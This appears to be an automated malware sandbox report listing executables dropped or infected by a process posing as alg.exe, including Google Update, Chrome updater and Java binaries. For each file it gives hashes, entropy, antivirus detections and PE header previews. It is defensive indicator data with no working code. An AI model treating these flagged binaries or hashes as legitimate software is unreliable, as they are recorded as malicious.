                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1419264
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.466717959952616
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:LlnRklQ6fgJcEwixKsqjnhMgeiCl7G0nehbGZpbD:XoRfgJcEwCeDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:C37A04FA53033EB400D6FE69E0BB8D12
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:D7B881C74867179D796037991DCCA5B3869C872A
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:5AACC02EC4DCA2B6B2834278AA243967A5380BF7D99D00422E1F95A3DB0F413F
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:09A547A3E0F61FB1964DAF5A88019C2584C9896B58F97EF42BF1086B4C1604C33DE7AF7195F3400E2535E8356F7020D09DB73DEB5CADD8FD9D0374FB863F4B08
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@.................................;/......................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1522176
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.496523634632776
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:2W25k8hb0Haw+x6sqjnhMgeiCl7G0nehbGZpbD:2Wyk8SHawmODmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:CC293C8EC7DA374BD130A65083F234CE
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:4C3A4AA547B10A21047A2BA775FF29557011CCEC
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:AA81949E6F700F6C93570C1F3F40E47DD7C516B36633BD0A02633A68400D24DA
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:2D754026F604F9330FA58D0A4BDE3D08157EE8F5E40E78D1A7AB8894C45BDCDA9C6E797270D42723DACD943B8452B636D61E9B4533F276C4EC08C950186F89B5
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@....................................[..... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.16394020018515
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:tWP/aK2vB+9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:tKCKABisqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:BEBC06B475FEB7732214EEB9797E01B5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:F9D1E715DCCFE7EBFF1B04280440380F6306E985
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:A89345A752727AD38544BB7926C344B77B224FCDC0428E6816F30568620D1384
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:5E8D695B4B208206A91E1E567CEF70BBCB76458ED1C7465082475F96B243BB6A67C70CC91C940388432486D249B6E390CE134E75C4AC77EB1412CD501CF3D6AE
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.........................................................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.162029480327423
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:jO7cCNWB+09LXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:qjNWBPNsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:C992A8B722CE2B2FFCA96BA33DDBD5DF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:0BB5DE2732C27D4746676A1CEEDB996397E33BE7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:C7349CC5CC14D48593436A5C799BF893D322893F09434AC02CB2B4900EA9BCA2
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:3E3594F0F6E3D2E265A1EF6785D7C6A5E9DFF8CAB839911F9321BE4D14A4D3B23080D380DAA68D6D0EC6747F931BFE3071346549482B0A131002D007E5948DB8
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@..........................................................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1302528
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.2389274795584235
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:QihRyhdsRrvsqjnhMgeiCl7G0nehbGZpbD:QihsoRTDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:2AE6E2B196B4EDD4C379CB1CE0C0DFCB
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:015A4E1D9DACA3E3348650E7068D7E722C08BE94
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:01D808591D34A7D794E881A23839A9D7597F91FA27101AA331466003BE671F07
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:68F26981647633BAC3FD2C725687C12F15F461DBBB6DA4DBACC8D932DDF3BFDE6D997815EB6CCA9D4CECD0330976F6366E7B413B837C8244036240B253382671
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p............ ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1342464
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.351011837012069
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:q1FDmRF+wpx/QafUsqjnhMgeiCl7G0nehbGZpbD:EmRF+wn/JfwDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:DC769200D93874422FD1F7DB8F1BD966
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:7E267BF1F63BC7BC70011883C665A99B3ED19104
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:1245F961B04AFD47569216CEEF209B188AB3347F4338A26AB0F2B464576956C1
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:54E86768C1D31662E231061245CFEACCFDEF4CE464ADE429515C2476A5FFD1D090409C5E0461E338BCA6BD87C7B17A61185C7C470BB556E91FDDE603EA7444F8
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@..................................}...............................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.161982118053205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:P2Ae621B+0Y5Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:uE21BP2sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:0173B28C7A3A4F93EE4429EB36E87CAD
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:6505E98613F039CE0FFD8E0642095A67E2C28F9C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:652099CBFB36B5909BB4754F01E9324DEA1367CAC53901D600164A6CAE997850
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:FCEB6C7BF1E330B3303962F88E1A393C88654388005D8FD04E70B3914E91D8FF3D7D4F9536B4A5AD6DC012B74B0B0E9814410F8367A2F4FA1F308831F3E1B88F
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@..................................o.......................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):4877824
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.997099475811181
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:98304:vvHFftsBuLnimh3Q/85ICWcV/2ZNGQMZD527BWG:hGBg/3QU5tPmsVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:B1B1F6630BF72B6591DEDBDF2A9AC79F
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:B337FD3E1BEFF11457CA62A16DA0E2A777A35A44
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:FC79D67106DF45000DEF87D22B81AB9F4149FAE491776B8BCC7855BD238EDCD5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:98921689118CEBB37BE7AB5A713711EC11C9108083AC017687A22D4386A99C8F988DB0CB1DE23E69F4DB14007AA7F3B5EE6322E0359B37291647B666777B7564
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......4...VA................@..............................J......J... ..................................................X..P.......04A.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc...04A......6A..X..............@..@.reloc........A.......A.............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):4877824
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.997099209448132
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:98304:SvHFftsBuLnimh3Q/85ICWcV/2ZNGQMZD527BWG:2GBg/3QU5tPmsVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:2D07BFDE721731C5289EF4700EB5E509
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:9BC9DF94B2CED9A753D564F4CC0EBFF82850BEF7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:9952622C7C874FFE64468F3E9BCA4AF3DCA28FC4A928FEDAE1FA7B79F6D2D1C9
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:F0251E26474F776166C76608E16AEE376D0C46A07F1BBE2779A6C2C9EF69D6AF98A4F655016212A7DD9741FABEB82D8860ABEE8C7CB531139D2295B844984B19
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......4...VA................@..............................J.....9.J... ..................................................X..P.......04A.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc...04A......6A..X..............@..@.reloc........A.......A.............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1158144
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.068072794606509
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:miXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:misqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:B628B9DE12E489A5B9AC112DBE98C28F
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:D12C9D3F61356F243F40008D4B09071D6848C4A3
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:B8DC4FA152DC5DDF0EED5ABE4C5E6257FFDD252D78930DD1D3491DCC5614242C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:C7393ED5A8CEA23AFE4D5B2CF530D18F8705470C258BB170202BD4266DB3ED0F92490EB11F019C50F3D22ED1DDE1FC3CE946964A76D9AC0377CB7C0CC966EF14
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.................................f.......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.032409795036577
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:4KdXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:FdsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:3E1FA1A2B2F680CB99D80D5E16E60DC6
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:037D1954D44E2472FA7CF1B25CE15E861D857A9B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:9964234AC78E771AED6A2449EFAF10B0BF548F3494DF4F78B64EC9BF70F639FA
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:001FB5DABE2AE97B027916927DA7F7BFA41E604CD932E790042B65020A5F81D12B9E676BA1ABBF3768E219156A709A592E495B9CE7893DF3B30C42B19633512D
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.446071778140303
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:GnEbH0j4x7R6SvyCMcXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:GkwOtO7csqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:1D1044A9C8E738F6C8D77B38F7F37788
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:284788BB81A0A56B0701F2195B6DD28213899821
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:35372B145FF6673FF8F6F79AE49E4CE072BF64625DDD3E3BAD656692307E855D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:73173B9AA163AA5D3B59B1A44C4E3A1B5BBD3CEF71B318F5FF3C75D1EDD82AEDEC757DA73C13D1E13E48B6ADEE362977CA0436C9BC0B0D78A39D7F398BAFBF55
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
